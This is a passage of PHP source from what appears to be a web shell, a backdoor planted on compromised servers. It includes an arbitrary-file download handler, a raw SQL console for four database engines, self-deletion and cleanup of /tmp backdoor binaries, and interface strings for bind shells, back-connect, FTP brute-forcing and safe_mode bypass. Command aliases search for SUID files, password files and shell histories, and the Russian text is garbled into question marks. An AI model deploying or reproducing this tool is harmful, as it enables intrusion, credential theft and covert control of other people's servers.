245 $cdrec .= $name;
246 $this -> ctrl_dir[] = $cdrec;
247 }
248 function file()
249 {
250 $data = implode('', $this -> datasec);
251 $ctrldir = implode('', $this -> ctrl_dir);
252 return
253 $data .
254 $ctrldir .
255 $this -> eof_ctrl_dir .
256 pack('v', sizeof($this -> ctrl_dir)) .
257 pack('v', sizeof($this -> ctrl_dir)) .
258 pack('V', strlen($ctrldir)) .
259 pack('V', strlen($data)) .
260 "\x00\x00";
261 }
262}
263function compress(&$filename,&$filedump,$compress)
264 {
265 global $content_encoding;
266 global $mime_type;
267 if ($compress == 'bzip' && @function_exists('bzcompress'))
268 {
269 $filename .= '.bz2';
270 $mime_type = 'application/x-bzip2';
271 $filedump = bzcompress($filedump);
272 }
273 else if ($compress == 'gzip' && @function_exists('gzencode'))
274 {
275 $filename .= '.gz';
276 $content_encoding = 'x-gzip';
277 $mime_type = 'application/x-gzip';
278 $filedump = gzencode($filedump);
279 }
280 else if ($compress == 'zip' && @function_exists('gzcompress'))
281 {
282 $filename .= '.zip';
283 $mime_type = 'application/zip';
284 $zipfile = new zipfile();
285 $zipfile -> addFile($filedump, substr($filename, 0, -4));
286 $filedump = $zipfile -> file();
287 }
288 else
289 {
290 $mime_type = 'application/octet-stream';
291 }
292 }
293function mailattach($to,$from,$subj,$attach)
294 {
295 $headers = "From: $from\r\n";
296 $headers .= "MIME-Version: 1.0\r\n";
297 $headers .= "Content-Type: ".$attach['type'];
298 $headers .= "; name=\"".$attach['name']."\"\r\n";
299 $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
300 $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
301 if(@mail($to,$subj,"",$headers)) { return 1; }
302 return 0;
303 }
304if(isset($_GET['img'])&&!empty($_GET['img']))
305 {
306 $images = array();
307 $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw==';
308 $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw==';
309 @ob_clean();
310 header("Content-type: image/gif");
311 echo base64_decode($images[$_GET['img']]);
312 die();
313 }
314if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
315 {
316 if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; }
317 else
318 {
319 @ob_clean();
320 $filename = @basename($_POST['d_name']);
321 $filedump = @fread($file,@filesize($_POST['d_name']));
322 fclose($file);
323 $content_encoding=$mime_type='';
324 compress($filename,$filedump,$_POST['compress']);
325 if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
326 header("Content-type: ".$mime_type);
327 header("Content-disposition: attachment; filename=\"".$filename."\";");
328 echo $filedump;
329 exit();
330 }
331 }
332if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
333if ($_POST['cmd']=="db_query")
334 {
335 echo $head;
336 switch($_POST['db'])
337 {
338 case 'MySQL':
339 if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
340 $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
341 if($db)
342 {
343 if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); }
344 $querys = @explode(';',$_POST['db_query']);
345 foreach($querys as $num=>$query)
346 {
347 if(strlen($query)>5){
348 echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
349 $res = @mysql_query($query,$db);
350 $error = @mysql_error($db);
351 if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
352 else {
353 if (@mysql_num_rows($res) > 0)
354 {
355 $sql2 = $sql = $keys = $values = '';
356 while (($row = @mysql_fetch_assoc($res)))
357 {
358 $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
359 $values = @array_values($row);
360 foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
361 $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
362 $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
363 }
364 echo "<table width=100%>";
365 $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
366 $sql .= $sql2;
367 echo $sql;
368 echo "</table><br>";
369 }
370 else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
371 }
372 @mysql_free_result($res);
373 }
374 }
375 @mysql_close($db);
376 }
377 else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>";
378 break;
379 case 'MSSQL':
380 if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
381 $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
382 if($db)
383 {
384 if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }
385 $querys = @explode(';',$_POST['db_query']);
386 foreach($querys as $num=>$query)
387 {
388 if(strlen($query)>5){
389 echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
390 $res = @mssql_query($query,$db);
391 if (@mssql_num_rows($res) > 0)
392 {
393 $sql2 = $sql = $keys = $values = '';
394 while (($row = @mssql_fetch_assoc($res)))
395 {
396 $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
397 $values = @array_values($row);
398 foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
399 $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
400 $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
401 }
402 echo "<table width=100%>";
403 $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
404 $sql .= $sql2;
405 echo $sql;
406 echo "</table><br>";
407 }
408 /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */
409 @mssql_free_result($res);
410 }
411 }
412 @mssql_close($db);
413 }
414 else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>";
415 break;
416 case 'PostgreSQL':
417 if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
418 $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
419 $db = @pg_connect($str);
420 if($db)
421 {
422 $querys = @explode(';',$_POST['db_query']);
423 foreach($querys as $num=>$query)
424 {
425 if(strlen($query)>5){
426 echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
427 $res = @pg_query($db,$query);
428 $error = @pg_errormessage($db);
429 if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
430 else {
431 if (@pg_num_rows($res) > 0)
432 {
433 $sql2 = $sql = $keys = $values = '';
434 while (($row = @pg_fetch_assoc($res)))
435 {
436 $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
437 $values = @array_values($row);
438 foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
439 $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
440 $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
441 }
442 echo "<table width=100%>";
443 $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
444 $sql .= $sql2;
445 echo $sql;
446 echo "</table><br>";
447 }
448 else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
449 }
450 @pg_free_result($res);
451 }
452 }
453 @pg_close($db);
454 }
455 else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>";
456 break;
457 case 'Oracle':
458 $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']);
459 if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; }
460 else
461 {
462 $querys = @explode(';',$_POST['db_query']);
463 foreach($querys as $num=>$query)
464 {
465 if(strlen($query)>5) {
466 echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
467 $stat = @ociparse($db, $query);
468 @ociexecute($stat);
469 if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; }
470 else
471 {
472 $rowcount = @ocirowcount($stat);
473 if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";}
474 else {
475 echo "<table width=100%><tr>";
476 for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; }
477 echo "</tr>";
478 while(ocifetch($stat))
479 {
480 echo "<tr>";
481 for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; }
482 echo "</tr>";
483 }
484 echo "</table><br>";
485 }
486 @ocifreestatement($stat);
487 }
488 }
489 }
490 @ocilogoff($db);
491 }
492 break;
493 }
494 echo "<form name=form method=POST>";
495 echo in('hidden','db',0,$_POST['db']);
496 echo in('hidden','db_port',0,$_POST['db_port']);
497 echo in('hidden','mysql_l',0,$_POST['mysql_l']);
498 echo in('hidden','mysql_p',0,$_POST['mysql_p']);
499 echo in('hidden','mysql_db',0,$_POST['mysql_db']);
500 echo in('hidden','cmd',0,'db_query');
501 echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
502 echo "</form>";
503 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
504 }
505if(isset($_GET['delete']))
506 {
507 @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
508 }
509if(isset($_GET['tmp']))
510 {
511 @unlink("/tmp/bdpl");
512 @unlink("/tmp/back");
513 @unlink("/tmp/bd");
514 @unlink("/tmp/bd.c");
515 @unlink("/tmp/dp");
516 @unlink("/tmp/dpc");
517 @unlink("/tmp/dpc.c");
518 }
519if(isset($_GET['phpini']))
520{
521echo $head;
522function U_value($value)
523 {
524 if ($value == '') return '<i>no value</i>';
525 if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
526 if ($value === null) return 'NULL';
527 if (@is_object($value)) $value = (array) $value;
528 if (@is_array($value))
529 {
530 @ob_start();
531 print_r($value);
532 $value = @ob_get_contents();
533 @ob_end_clean();
534 }
535 return U_wordwrap((string) $value);
536 }
537function U_wordwrap($str)
538 {
539 $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
540 return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
541 }
542if (@function_exists('ini_get_all'))
543 {
544 $r = '';
545 echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
546 foreach (@ini_get_all() as $key=>$value)
547 {
548 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
549 }
550 echo $r;
551 echo '</table>';
552 }
553echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
554die();
555}
556if(isset($_GET['cpu']))
557 {
558 echo $head;
559 echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
560 $cpuf = @file("cpuinfo");
561 if($cpuf)
562 {
563 $c = @sizeof($cpuf);
564 for($i=0;$i<$c;$i++)
565 {
566 $info = @explode(":",$cpuf[$i]);
567 if($info[1]==""){ $info[1]="---"; }
568 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
569 }
570 echo $r;
571 }
572 else
573 {
574 echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
575 }
576 echo '</table>';
577 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
578 die();
579 }
580if(isset($_GET['mem']))
581 {
582 echo $head;
583 echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
584 $memf = @file("meminfo");
585 if($memf)
586 {
587 $c = sizeof($memf);
588 for($i=0;$i<$c;$i++)
589 {
590 $info = explode(":",$memf[$i]);
591 if($info[1]==""){ $info[1]="---"; }
592 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
593 }
594 echo $r;
595 }
596 else
597 {
598 echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
599 }
600 echo '</table>';
601 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
602 die();
603 }
604$lang=array(
605'ru_text1' =>'??????????? ???????',
606'ru_text2' =>'?????????? ?????? ?? ???????',
607'ru_text3' =>'????????? ???????',
608'ru_text4' =>'??????? ??????????',
609'ru_text5' =>'???????? ?????? ?? ??????',
610'ru_text6' =>'????????? ????',
611'ru_text7' =>'??????',
612'ru_text8' =>'???????? ?????',
613'ru_butt1' =>'?????????',
614'ru_butt2' =>'?????????',
615'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
616'ru_text10'=>'??????? ????',
617'ru_text11'=>'?????? ??? ???????',
618'ru_butt3' =>'???????',
619'ru_text12'=>'back-connect',
620'ru_text13'=>'IP-?????',
621'ru_text14'=>'????',
622'ru_butt4' =>'?????????',
623'ru_text15'=>'???????? ?????? ? ?????????? ???????',
624'ru_text16'=>'????????????',
625'ru_text17'=>'????????? ????',
626'ru_text18'=>'????????? ????',
627'ru_text19'=>'Exploits',
628'ru_text20'=>'????????????',
629'ru_text21'=>'????? ???',
630'ru_text22'=>'datapipe',
631'ru_text23'=>'????????? ????',
632'ru_text24'=>'????????? ????',
633'ru_text25'=>'????????? ????',
634'ru_text26'=>'????????????',
635'ru_butt5' =>'?????????',
636'ru_text28'=>'?????? ? safe_mode',
637'ru_text29'=>'?????? ????????',
638'ru_butt6' =>'???????',
639'ru_text30'=>'???????? ?????',
640'ru_butt7' =>'???????',
641'ru_text31'=>'???? ?? ??????',
642'ru_text32'=>'?????????? PHP ????',
643'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
644'ru_butt8' =>'?????????',
645'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
646'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
647'ru_text36'=>'????',
648'ru_text37'=>'?????',
649'ru_text38'=>'??????',
650'ru_text39'=>'???????',
651'ru_text40'=>'???? ??????? ???? ??????',
652'ru_butt9' =>'????',
653'ru_text41'=>'????????? ? ?????',
654'ru_text42'=>'?????????????? ?????',
655'ru_text43'=>'????????????? ????',
656'ru_butt10'=>'?????????',
657'ru_butt11'=>'?????????????',
658'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
659'ru_text45'=>'???? ????????',
660'ru_text46'=>'???????? phpinfo()',
661'ru_text47'=>'???????? ???????? php.ini',
662'ru_text48'=>'???????? ????????? ??????',
663'ru_text49'=>'???????? ??????? ? ???????',
664'ru_text50'=>'?????????? ? ??????????',
665'ru_text51'=>'?????????? ? ??????',
666'ru_text52'=>'????? ??? ??????',
667'ru_text53'=>'?????? ? ?????',
668'ru_text54'=>'????? ?????? ? ??????',
669'ru_butt12'=>'?????',
670'ru_text55'=>'?????? ? ??????',
671'ru_text56'=>'?????? ?? ???????',
672'ru_text57'=>'???????/??????? ????/??????????',
673'ru_text58'=>'???',
674'ru_text59'=>'????',
675'ru_text60'=>'??????????',
676'ru_butt13'=>'???????/???????',
677'ru_text61'=>'???? ??????',
678'ru_text62'=>'?????????? ???????',
679'ru_text63'=>'???? ??????',
680'ru_text64'=>'?????????? ???????',
681'ru_text65'=>'???????',
682'ru_text66'=>'???????',
683'ru_text67'=>'Chown/Chgrp/Chmod',
684'ru_text68'=>'???????',
685'ru_text69'=>'????????1',
686'ru_text70'=>'????????2',
687'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
688'ru_text72'=>'????? ??? ??????',
689'ru_text73'=>'?????? ? ?????',
690'ru_text74'=>'?????? ? ??????',
691'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
692'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
693'ru_text77'=>'???????? ????????? ???? ??????',
694'ru_text78'=>'?????????? ???????',
695'ru_text79'=>'?????????? ???????',
696'ru_text80'=>'???',
697'ru_text81'=>'????',
698'ru_text82'=>'???? ??????',
699'ru_text83'=>'?????????? SQL ???????',
700'ru_text84'=>'SQL ??????',
701'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
702'ru_text86'=>'?????????? ????? ? ???????',
703'ru_butt14'=>'???????',
704'ru_text87'=>'???????? ?????? ? ?????????? ftp-???????',
705'ru_text88'=>'FTP-??????:????',
706'ru_text89'=>'???? ?? ftp ???????',
707'ru_text90'=>'????? ????????',
708'ru_text91'=>'???????????? ?',
709'ru_text92'=>'??? ?????????',
710'ru_text93'=>'FTP',
711'ru_text94'=>'FTP-????????',
712'ru_text95'=>'?????? ?????????????',
713'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
714'ru_text97'=>'????????? ??????????: ',
715'ru_text98'=>'??????? ???????????: ',
716'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd',
717'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
718'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????',
719'ru_text102'=>'?????',
720'ru_text103'=>'???????? ??????',
721'ru_text104'=>'???????? ????? ?? ???????? ????',
722'ru_text105'=>'????',
723'ru_text106'=>'??',
724'ru_text107'=>'????',
725'ru_butt15'=>'?????????',
726'ru_text108'=>'????? ??????',
727'ru_text109'=>'????????',
728'ru_text110'=>'??????????',
729/* --------------------------------------------------------------- */
730'eng_text1' =>'Executed command',
731'eng_text2' =>'Execute command on server',
732'eng_text3' =>'Run command',
733'eng_text4' =>'Work directory',
734'eng_text5' =>'Upload files on server',
735'eng_text6' =>'Local file',
736'eng_text7' =>'Aliases',
737'eng_text8' =>'Select alias',
738'eng_butt1' =>'Execute',
739'eng_butt2' =>'Upload',
740'eng_text9' =>'Bind port to /bin/bash',
741'eng_text10'=>'Port',
742'eng_text11'=>'Password for access',
743'eng_butt3' =>'Bind',
744'eng_text12'=>'back-connect',
745'eng_text13'=>'IP',
746'eng_text14'=>'Port',
747'eng_butt4' =>'Connect',
748'eng_text15'=>'Upload files from remote server',
749'eng_text16'=>'With',
750'eng_text17'=>'Remote file',
751'eng_text18'=>'Local file',
752'eng_text19'=>'Exploits',
753'eng_text20'=>'Use',
754'eng_text21'=>'&nbsp;New name',
755'eng_text22'=>'datapipe',
756'eng_text23'=>'Local port',
757'eng_text24'=>'Remote host',
758'eng_text25'=>'Remote port',
759'eng_text26'=>'Use',
760'eng_butt5' =>'Run',
761'eng_text28'=>'Work in safe_mode',
762'eng_text29'=>'ACCESS DENIED',
763'eng_butt6' =>'Change',
764'eng_text30'=>'Cat file',
765'eng_butt7' =>'Show',
766'eng_text31'=>'File not found',
767'eng_text32'=>'Eval PHP code',
768'eng_text33'=>'Test bypass open_basedir with cURL functions',
769'eng_butt8' =>'Test',
770'eng_text34'=>'Test bypass safe_mode with include function',
771'eng_text35'=>'Test bypass safe_mode with load file in mysql',
772'eng_text36'=>'Database',
773'eng_text37'=>'Login',
774'eng_text38'=>'Password',
775'eng_text39'=>'Table',
776'eng_text40'=>'Dump database table',
777'eng_butt9' =>'Dump',
778'eng_text41'=>'Save dump in file',
779'eng_text42'=>'Edit files',
780'eng_text43'=>'File for edit',
781'eng_butt10'=>'Save',
782'eng_text44'=>'Can\'t edit file! Only read access!',
783'eng_text45'=>'File saved',
784'eng_text46'=>'Show phpinfo()',
785'eng_text47'=>'Show variables from php.ini',
786'eng_text48'=>'Delete temp files',
787'eng_butt11'=>'Edit file',
788'eng_text49'=>'Delete script from server',
789'eng_text50'=>'View cpu info',
790'eng_text51'=>'View memory info',
791'eng_text52'=>'Find text',
792'eng_text53'=>'In dirs',
793'eng_text54'=>'Find text in files',
794'eng_butt12'=>'Find',
795'eng_text55'=>'Only in files',
796'eng_text56'=>'Nothing :(',
797'eng_text57'=>'Create/Delete File/Dir',
798'eng_text58'=>'name',
799'eng_text59'=>'file',
800'eng_text60'=>'dir',
801'eng_butt13'=>'Create/Delete',
802'eng_text61'=>'File created',
803'eng_text62'=>'Dir created',
804'eng_text63'=>'File deleted',
805'eng_text64'=>'Dir deleted',
806'eng_text65'=>'Create',
807'eng_text66'=>'Delete',
808'eng_text67'=>'Chown/Chgrp/Chmod',
809'eng_text68'=>'Command',
810'eng_text69'=>'param1',
811'eng_text70'=>'param2',
812'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
813'eng_text72'=>'Text for find',
814'eng_text73'=>'Find in folder',
815'eng_text74'=>'Find in files',
816'eng_text75'=>'* you can use regexp',
817'eng_text76'=>'Search text in files via find',
818'eng_text77'=>'Show database structure',
819'eng_text78'=>'show tables',
820'eng_text79'=>'show columns',
821'eng_text80'=>'Type',
822'eng_text81'=>'Net',
823'eng_text82'=>'Databases',
824'eng_text83'=>'Run SQL query',
825'eng_text84'=>'SQL query',
826'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
827'eng_text86'=>'Download files from server',
828'eng_butt14'=>'Download',
829'eng_text87'=>'Download files from remote ftp-server',
830'eng_text88'=>'FTP-server:port',
831'eng_text89'=>'File on ftp',
832'eng_text90'=>'Transfer mode',
833'eng_text91'=>'Archivation',
834'eng_text92'=>'without archivation',
835'eng_text93'=>'FTP',
836'eng_text94'=>'FTP-bruteforce',
837'eng_text95'=>'Users list',
838'eng_text96'=>'Can\'t get users list',
839'eng_text97'=>'checked: ',
840'eng_text98'=>'success: ',
841'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
842'eng_text100'=>'Send file to remote ftp server',
843'eng_text101'=>'Use reverse (user -> resu) login for password',
844'eng_text102'=>'Mail',
845'eng_text103'=>'Send email',
846'eng_text104'=>'Send file to email',
847'eng_text105'=>'To',
848'eng_text106'=>'From',
849'eng_text107'=>'Subj',
850'eng_butt15'=>'Send',
851'eng_text108'=>'Mail',
852'eng_text109'=>'Hide',
853'eng_text110'=>'Show',
854);
855/*
856?????? ??????
857????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
858?? ?????? ???? ????????? ??? ???????? ???????.
859*/
860$aliases=array(
861'find suid files'=>'find / -type f -perm -04000 -ls',
862'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
863'find sgid files'=>'find / -type f -perm -02000 -ls',
864'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
865'find config.inc.php files'=>'find / -type f -name config.inc.php',
866'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
867'find config* files'=>'find / -type f -name "config*"',
868'find config* files in current dir'=>'find . -type f -name "config*"',
869'find all writable files'=>'find / -type f -perm -2 -ls',
870'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
871'find all writable directories'=>'find / -type d -perm -2 -ls',
872'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
873'find all writable directories and files'=>'find / -perm -2 -ls',
874'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
875'find all service.pwd files'=>'find / -type f -name service.pwd',
876'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
877'find all .htpasswd files'=>'find / -type f -name .htpasswd',
878'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
879'find all .bash_history files'=>'find / -type f -name .bash_history',
880'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
881'find all .mysql_history files'=>'find / -type f -name .mysql_history',
882'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
883'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
884'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
885'list file attributes on a Linux second extended file system'=>'lsattr -va',
886'show opened ports'=>'netstat -an | grep -i listen',
887'----------------------------------------------------------------------------------------------------'=>'ls -la'
888);
889$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
890$table_up2 = " ::</div></b></font></td></tr><tr><td>";
891$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
892$table_end1 = "</td></tr>";
893$arrow = " <font face=Wingdings color=gray>?</font>";
894$lb = "<font color=black>[</font>";
895$rb = "<font color=black>]</font>";
896$font = "<font face=Verdana size=-2>";
897$ts = "<table class=table1 width=100% align=center>";
898$te = "</table>";
899$fs = "<form name=form method=POST>";
900$fe = "</form>";
901
902if(isset($_GET['users']))
903 {
904 if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
905 else
906 {
907 echo '<center>';
908 foreach($users as $user) { echo $user."<br>"; }
909 echo '</center>';
910 }
911 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
912 }
913
914if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
915$dir = @getcwd();
916$windows = 0;
917$unix = 0;
918if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
919if(empty($dir))
920 {
921 $os = getenv('OS');
922 if(empty($os)){ $os = php_uname(); }
923 if(empty($os)){ $os ="-"; $unix=1; }
924 else
925 {
926 if(@eregi("^win",$os)) { $windows = 1; }
927 else { $unix = 1; }
928 }
929 }
930if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
931 {
932 echo $head;
933 if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
934 else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
935 $sr->SearchText(0,0);
936 $res = $sr->GetResultFiles();
937 $found = $sr->GetMatchesCount();
938 $titles = $sr->GetTitles();
939 $r = "";
940 if($found > 0)
941 {
942 $r .= "<TABLE width=100%>";
943 foreach($res as $file=>$v)
944 {
945 $r .= "<TR>";
946 $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
947 $r .= ($windows)? str_replace("/","\\",$file) : $file;
948 $r .= "</b></font></ TD>";
949 $r .= "</TR>";
950 foreach($v as $a=>$b)
951 {
952 $r .= "<TR>";
953 $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
954 $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
955 $r .= "</TR>\n";
956 }
957 }
958 $r .= "</TABLE>";
959 echo $r;
960 }
961 else
962 {
